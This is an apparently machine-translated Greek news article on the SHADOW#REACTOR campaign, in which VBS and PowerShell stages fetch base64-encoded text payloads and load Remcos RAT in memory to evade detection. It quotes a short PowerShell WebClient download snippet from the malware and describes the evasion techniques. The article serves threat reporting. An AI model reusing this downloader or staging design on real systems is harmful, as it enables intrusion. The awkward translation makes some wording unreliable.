Οι ερευνητές ασφαλείας εντόπισαν μια εξελιγμένη εκστρατεία κακόβουλου λογισμικού πολλαπλών σταδίων των Windows που ονομάζεται SHADOW#REACTOR που αντιπροσωπεύει μια σημαντική εξέλιξη στους μηχανισμούς παράδοσης για εργαλεία απομακρυσμένης πρόσβασης.
Η εκστρατεία δείχνει πώς οι φορείς απειλών συνδυάζουν τις παραδοσιακές τεχνικές σεναρίου με σύγχρονες μεθόδους συσκότισης για να παρακάμψουν τις άμυνες ασφαλείας.
Η μόλυνση ξεκινά με ένα συγκεχυμένο σενάριο Visual Basic που εκκινεί μια προσεκτικά ενορχηστρωμένη αλυσίδα σταδίων εκτέλεσης, το καθένα σχεδιασμένο για να χειρίζεται συγκεκριμένες λειτουργίες ελαχιστοποιώντας παράλληλα την ανίχνευση.
Το διάνυσμα επίθεσης βασίζεται στην αλληλεπίδραση των χρηστών, με τα θύματα να εκτελούν εν αγνοία τους ένα κακόβουλο αρχείο VBS που συνήθως παραδίδεται μέσω παραβιασμένων πόρων ιστού ή δολωμάτων κοινωνικής μηχανικής.
Μόλις εκτελεστεί, το σενάριο εκκινεί διαδικασίες PowerShell που ανακτούν κομμάτια ωφέλιμου φορτίου από απομακρυσμένη υποδομή. Αυτά τα θραύσματα παραμένουν κωδικοποιημένα ως αρχεία απλού κειμένου, αποφεύγοντας κοινές υπογραφές δυαδικής ανίχνευσης.
.webp.jpeg "Το κακόβουλο λογισμικό πολλαπλών σταδίων των Windows καλεί το πρόγραμμα λήψης PowerShell χρησιμοποιώντας ωφέλιμα φορτία που βασίζονται σε κείμενο χρησιμοποιώντας απομακρυσμένο κεντρικό υπολογιστή")
Η αρθρωτή προσέγγιση επιτρέπει στους εισβολείς να ενημερώνουν ανεξάρτητα μεμονωμένα στάδια χωρίς να αναδιαρθρώνουν ολόκληρη την αλυσίδα.
Η καμπάνια παρουσιάζει έναν ασυνήθιστο συνδυασμό τεχνικών που ζουν εκτός της γης και προσαρμοσμένων επιπέδων συσκότισης.
Κάθε στάδιο εκτέλεσης μεταβιβάζει τον έλεγχο στο επόμενο μέσω προσεκτικά διαχειριζόμενων μεταβιβάσεων, διασφαλίζοντας την ακεραιότητα του ωφέλιμου φορτίου σε πολλές λήψεις.
Οι εισβολείς εφάρμοσαν ελέγχους πλεονασμού και μηχανισμούς επικύρωσης μεγέθους για να εγγυηθούν την επιτυχή ανακατασκευή του ωφέλιμου φορτίου.
Αναλυτές της Securonix αναγνωρισθείς το κακόβουλο λογισμικό μετά το δεύτερο στάδιο αποκάλυψε χαρακτηριστικά μοτίβα στην κατασκευή εντολών PowerShell και τις λειτουργίες αποκωδικοποίησης base64.
Η ερευνητική ομάδα εντόπισε τις συνδέσεις υποδομής και αντιστοίχισε την τελική υπογραφή ωφέλιμου φορτίου με το Remcos RAT, ένα εμπορικά διαθέσιμο εργαλείο απομακρυσμένης διαχείρισης που επαναπροορίζεται για κακόβουλη χρήση.
.webp.jpeg "Το κακόβουλο λογισμικό πολλαπλών σταδίων των Windows καλεί το πρόγραμμα λήψης PowerShell χρησιμοποιώντας ωφέλιμα φορτία που βασίζονται σε κείμενο χρησιμοποιώντας απομακρυσμένο κεντρικό υπολογιστή")
Η ανάλυση αποκάλυψε ότι η αρχική ανίχνευση των αναλυτών της Securonix επικεντρώθηκε σε ασυνήθιστα wscript.exe που παράγει πολλαπλές παρουσίες PowerShell με εκτεταμένες ενσωματωμένες εντολές – ένα χαρακτηριστικό μοτίβο συμπεριφοράς που σπάνια παρατηρείται σε νόμιμες λειτουργίες των Windows.
The Text-Only Staging Pipeline: A Novel Delivery Approach
Το καθοριστικό χαρακτηριστικό του SHADOW#REACTOR βρίσκεται στον μη συμβατικό μηχανισμό σταδιοποίησης που βασίζεται σε κείμενο.
Αντί να φιλοξενούν απευθείας δυαδικά ωφέλιμα φορτία, οι εισβολείς διατηρούν κωδικοποιημένο περιεχόμενο σε αρχεία απλού κειμένου, συμπεριλαμβανομένων των qpwoe32.txt, qpwoe64.txt, teste32.txt, teste64.txt και config.txt.
.webp.jpeg "Το κακόβουλο λογισμικό πολλαπλών σταδίων των Windows καλεί το πρόγραμμα λήψης PowerShell χρησιμοποιώντας ωφέλιμα φορτία που βασίζονται σε κείμενο χρησιμοποιώντας απομακρυσμένο κεντρικό υπολογιστή")
Αυτά τα αρχεία περιέχουν κώδικα συναρμολόγησης με κωδικοποίηση base64 που εμφανίζεται ως αβλαβή δεδομένα κειμένου σε αυτοματοποιημένα συστήματα ασφαλείας που εκτελούν σαρώσεις ρουτίνας.
Το σταδιακό πρόγραμμα PowerShell υλοποιεί έναν βρόχο λήψης με κατώφλια ελάχιστου μεγέθους και μηχανισμούς χρονικού ορίου.
Εάν το ανακτηθέν αρχείο πέσει κάτω από τα αναμενόμενα μεγέθη, το σενάριο επαναλαμβάνει αυτόματα τη λήψη, διασφαλίζοντας ότι οι ελλιπείς μεταδόσεις δεν διακόπτουν την εκτέλεση.
.webp.jpeg "Το κακόβουλο λογισμικό πολλαπλών σταδίων των Windows καλεί το πρόγραμμα λήψης PowerShell χρησιμοποιώντας ωφέλιμα φορτία που βασίζονται σε κείμενο χρησιμοποιώντας απομακρυσμένο κεντρικό υπολογιστή")
Αυτός ο μηχανισμός ανθεκτικότητας επιτρέπει στους χειριστές να διαχειρίζονται ενημερώσεις ωφέλιμου φορτίου χωρίς να διακόπτεται ολόκληρη η αλυσίδα μόλυνσης.
Μόλις επιτύχει η επικύρωση, τα επόμενα στάδια αποκωδικοποιούν και ανακατασκευάζουν το περιεχόμενο σε λειτουργικές συναρμολογήσεις .NET φορτωμένες εξ ολοκλήρου στη μνήμη χρησιμοποιώντας τεχνικές ανακλαστικής φόρτωσης.
$webClient = New-Object System.Net.WebClient
$uwehj = $webClient.DownloadString($mlkia)
$uwehj | Out-File -FilePath $Iuytq -Encoding UTF8Η προσέγγιση μόνο κειμένου περιπλέκει σημαντικά τον στατικό εντοπισμό, καθώς οι λύσεις ασφαλείας συνήθως επισημαίνουν δυαδικά εκτελέσιμα αρχεία αντί για φαινομενικά αβλαβή αρχεία κειμένου.
Σε συνδυασμό με την εκτέλεση στη μνήμη και τη συσκότιση της αλυσίδας διεργασιών, αυτή η διοχέτευση σταδιοποίησης αντιπροσωπεύει μια υπολογισμένη προσπάθεια διατήρησης της επιμονής αποφεύγοντας τα συστήματα ανίχνευσης και απόκρισης τελικού σημείου που έχουν σχεδιαστεί για τον εντοπισμό παραδοσιακών μοτίβων παράδοσης κακόβουλου λογισμικού.
